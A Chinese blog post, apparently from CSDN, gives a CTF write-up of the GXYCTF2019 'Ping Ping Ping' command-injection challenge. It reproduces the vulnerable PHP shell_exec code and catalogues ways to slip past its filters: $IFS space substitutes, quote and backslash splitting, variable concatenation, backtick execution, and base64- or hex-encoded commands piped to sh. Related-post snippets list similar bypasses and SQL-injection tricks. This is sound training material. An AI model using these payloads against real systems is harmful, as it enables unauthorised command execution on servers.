CTFWeb-命令执行漏洞过滤的绕过姿势

最新推荐文章于 2024-05-06 11:30:35 发布
最新推荐文章于 2024-05-06 11:30:35 发布
阅读量1.3w 收藏 143
点赞数 29
分类专栏: CTF之路
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39190897/article/details/116247765
版权

文章目录

前言

为了备战(划水)5 月份广东省的 “红帽杯” 网络安全竞赛,继续开始到 BUUCTF 平台练习 CTF 题目。在去年参加的第四届强网杯全国网络安全竞赛中,就遇到过命令执行漏洞绕过的题目 CTF解题-2020年强网杯参赛WriteUp(题目名称 “主动” ),当时采用了 base64 编码联合反引号、变量拼接两种方式绕过了 flag 关键字的过滤并读取了 flag 值:
在这里插入图片描述在这里插入图片描述本文目的在于结合 BUUCTF 平台中关于 2019 年 GXYCTF 竞赛中的一道命令执行绕过题目,总结此类题目的绕过姿势和解题方法。

关于命令执行漏洞的介绍和 DVWA 靶场实例,可参见我的另一博文:Web安全-命令执行漏洞

CTF题目

先来看看题目:
在这里插入图片描述1、访问题目地址,很明显提示在 URL 拼接 ip 参数,结合题目名称,可猜测是考察命令执行漏洞:
在这里插入图片描述2、拼接 ip 参数并尝试赋值 127.0.0.1,发现是执行力 ping 命令:
在这里插入图片描述3、拼接 ls 命令尝试进行命令执行,发现了 flag.php
在这里插入图片描述4、尝试直接读取flag.php,发现存在空格过滤,读取失败:
在这里插入图片描述5、尝试使用${IFS}$替换空格,发现过滤了{}
在这里插入图片描述6、那就尝试使用$IFS$1替换空格,可绕过空格过滤,但发现还过滤flag关键词:
在这里插入图片描述7、既然 flag.php读取失败,那就先看看index.php吧,发现了过滤规则:
在这里插入图片描述
源码如下:

<!--?php
if(isset($_GET['ip'])){
  $ip = $_GET['ip'];
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\
-->
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo " ";
  print_r($a);
}
?>

可以看到,服务端过滤了以下字符:

& /* < x{00}-\x{1f} ' " \ () [] {}  空格
"xxxfxxxlxxxaxxxgxxx" " " "bash"

想要读取 flag.php 文件,就必须想办法绕过上述过滤。

绕过姿势

了解完题目概况,下面就开始学习 CTF 中命令执行漏洞相关的绕过姿势。

命令联合执行

来看看命令联合执行时的一些关键词特性:

连接词释义
;前面的命令执行完以后,继续执行后面的命令
|管道符,将上一条命令的输出作为下一条命令的参数(显示后面的执行结果)
||当前面的命令执行出错时(为假)执行后面的命令
&将任务置于后台执行
&&前面的语句为假则直接出错,后面的也不执行,前面只能为真

比如上面的题目也可以使用| 进行命令拼接:
在这里插入图片描述

关键词的绕过

1、绕过空格过滤的方法

${IFS}$9
{IFS}
$IFS
${IFS}
$IFS$1 //$1改成$加其他数字貌似都行
IFS
< 
<> 
{cat,flag.php}  //用逗号实现了空格功能,需要用{}括起来
%20   (space)
%09   (tab)
X=$'cat\x09./flag.php';$X       (\x09表示tab,也可以用\x20)

2、禁用 cat 的方法

ps:有时会禁用cat:
解决方法是使用tac反向输出命令:
linux命令中可以加\,所以甚至可以ca\t /fl\ag

内联执行绕过

内联,就是将反引号内命令的输出作为输入执行。

?ip=127.0.0.1;cat$IFS$9`ls`

$IFS在Linux下表示为空格
$9是当前系统shell进程第九个参数持有者,始终为空字符串,$后可以接任意数字
这里$IFS$9$IFS垂直,后面加个$与{}类似,起截断作用

多种解法

学习完相关绕过姿势的理论基础,下面回到上面 CTF 实例题目中进行实战。

变量拼接

针对服务端 flag 关键词的贪婪匹配:

if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");

可构造如下 Payload 绕过:

?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

执行效果如下:
在这里插入图片描述此处顺便补充下一些通配符的方法:
在这里插入图片描述

内联执行

Payload:

?ip=127.0.0.1;cat$IFS$9`ls`

内联执行,就是将反引号内命令的输出作为输入执行:
在这里插入图片描述秒题大概就是这种做法吧……

Base64编码

Payload:

?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

这也是官方的 Writeup,原理是既然过滤 bash,那就用 sh,sh 的大部分脚本都可以在 bash下运行:
在这里插入图片描述

总结

本文学习并总结了 CTF 中对于命令执行漏洞的一些绕过技巧和思路,唯有多加练习和总结才能在 CTF 这种拼脑洞的游戏里生存啊……任重道远!

类似题目的解题方法总结:

cat fl**匹配任意 
cat fla**匹配任意
ca\t fla\g.php        反斜线绕过
cat fl''ag.php        两个单引号绕过
echo "Y2F0IGZsYWcucGhw" | base64 -d | bash      
//base64编码绕过(引号可以去掉)  |(管道符) 会把前一个命令的输出作为后一个命令的参数

echo "63617420666c61672e706870" | xxd -r -p | bash       
//hex编码绕过(引号可以去掉)

echo "63617420666c61672e706870" | xxd -r -p | sh     
//sh的效果和bash一样

cat fl[a]g.php       用[]匹配

a=fl;b=ag;cat $a$b          变量替换
cp fla{g.php,G}    把flag.php复制为flaG
ca${21}t a.txt     利用空变量  使用$*和$@,$x(x 代表 1-9),${x}(x>=10)(小于 10 也是可以的) 因为在没有传参的情况下,上面的特殊变量都是为空的

本文参考:

Tr0e
关注
  • 29
    点赞
  • 143
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 18
    评论
专栏目录
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
web-渗透-文件上传漏洞专题靶场.rar
03-14
本靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境...
Linux系统下绕过某个关键字的小技巧,比如flag关键字
weixin_44632787的博客
07-24 1980
Linux系统下绕过某个关键字的小技巧,比如绕过flag关键字 首先先在linux系统下创建一个文件名为flag.txt的文件。里面的内容为:This is Flag! 这里提供几个绕过某个关键字的小技巧。 单引号绕过: cat fla’g’.txt 双引号绕过: cat fla"g".txt 反斜线绕过: cat f\lag.txt $+数字绕过: cat fl$1ag.txt,cat fl$2ag.txt,cat fl$3ag.txt $@绕过: cat fl$@ag.txt Base6
2024年最新CTF题型 php filter特殊编码绕过小汇总,2024年最新网络安全开发实战讲解
最新发布
2401_84301853的博客
05-06 916
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
CTF 代码审计之绕过过滤的空白字符
天泽岁月
08-31 875
ctf空白字符
Linux下RCE绕过空格限制
weixin_44971601的博客
09-29 1118
Linux下RCE绕过空格限制
命令执行RCE各种绕过合集
2301_76690905的博客
11-22 327
对php来说这是fl""ag而不是flag关键字不会匹配上,但是对于linux系统来说cat /fl""ag等效于cat /flag。外面包裹的是单引号里面就是双引号,外面包裹的是双引号里面就是单引号,或者用斜线\去掉功能性,避免报错。被视为一个文件路径,并将该文件的内容输出到标准输出(通常是终端),并在每一行前添加行号。把一段已经拼接好的文件名输出到输出到一个文件里,然后把这个文件当成一个脚本去执行。目录是系统的标准目录之一,它包含了许多系统命令和工具的二进制文件,而。的文件,并给其内容添加行号。
CTF命令执行常见绕过
qq_42383069的博客
04-18 4950
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
SQL注入绕过技巧
whj_study的博客
12-18 2676
1.绕过空格(注释符/* */,%a0):   两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用浮点数: select * from users where id=8E0union select 1,2,3 select * from users where id=8.0 select 1,2,3 2.括号绕过空格:   如..
SQL注入之绕过空格
nihao_ma_的博客
05-07 1928
SQL注入之空格绕过技巧
绕过之cat|/ flag
m0_61011147的博客
09-06 1932
绕过之cat|/ flag
空格绕过方法
东隅的博客
02-21 886
%20 %09 \t
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
CTF-网络挑战使用PHP在Web中进行CTF挑战链接: :
ctf-web网络安全课程视频.zip
10-19
1 - 代码执行命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF Web各种题目的解题姿势
07-27
课时2:SSRF限制绕过策略13'07 课时3:SSRF中可以使用的协议分析17'44 课时4:Linux基础知识21'37 课时5:Redis未授权访问漏洞利用与防御16'17 课时6:Redis未授权添加ssh密钥f17'04 第5章 第五章 课时1:XXE-...
CTFCTF绕过空格的奇淫技巧
边扯边淡
11-16 1856
起序:学到了,技巧太骚了,总结一下。 ${IFS} $IFS$9 < <> {,} cat flag.txt cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt {cat,flag.txt} 如果对您有帮助,点个赞再走吧。
CTF赛题PHP7 正则绕过
kelenwait的博客
08-19 2494
题目为ctf web中php正则绕过题 前言:由于长度限制,且不像其他题目告知flag.php的内容, 笔者并没有求出flag,绕过思路可参考,也欢迎ctf大佬指点迷津。 题目如下,解析flag.php中的flag变量 <?php include("flag.php"); if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)>20){ die("Too Long."); }
BUUCTF Web [GXYCTF2019]Ping Ping Ping
热门推荐
wangyuxiang946的博客
10-28 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [GXYCTF2019]Ping Ping Ping一、题目简介二、思路分析1)多命令执行2)绕过空格3)绕过flag三、解题步骤1)查看当前目录2)查看文件内容3)flag 在注释中四、总结 一、题目简介 进入连接后是一个「ping」的功能,参数 ip 传递的内容会被当做 ip.
Linux下绕过空格的方式总结
今天吃什么
01-25 1万+
cat flag.txt cat${IFS}flag.txt cat$IFS$9flag.txt cat&lt;flag.txt cat&lt;&gt;flag.txt
CTFHub 命令注入-无过滤
07-25
CTFHub 命令注入-无过滤是一个题目,它的源代码中存在一个命令注入漏洞。在这个题目中,用户可以通过输入IP地址执行ping命令。\[1\]由于没有采用过滤,用户可以直接进行命令拼接,例如输入"192.168.43.222;ls"可以查看目录下的全部文件。\[2\]在这个题目中,flag被隐藏在网页源代码中。\[3\]为了防止命令注入漏洞,可以对用户输入进行过滤,例如过滤空格。 #### 引用[.reference_title] - *1* *2* [CTFHub -技能树 命令注入-无过滤](https://blog.csdn.net/qq_45653588/article/details/107556087)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFhub——命令执行](https://blog.csdn.net/qq_43277152/article/details/113649643)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 18
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tr0e

分享不易,望多鼓励~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值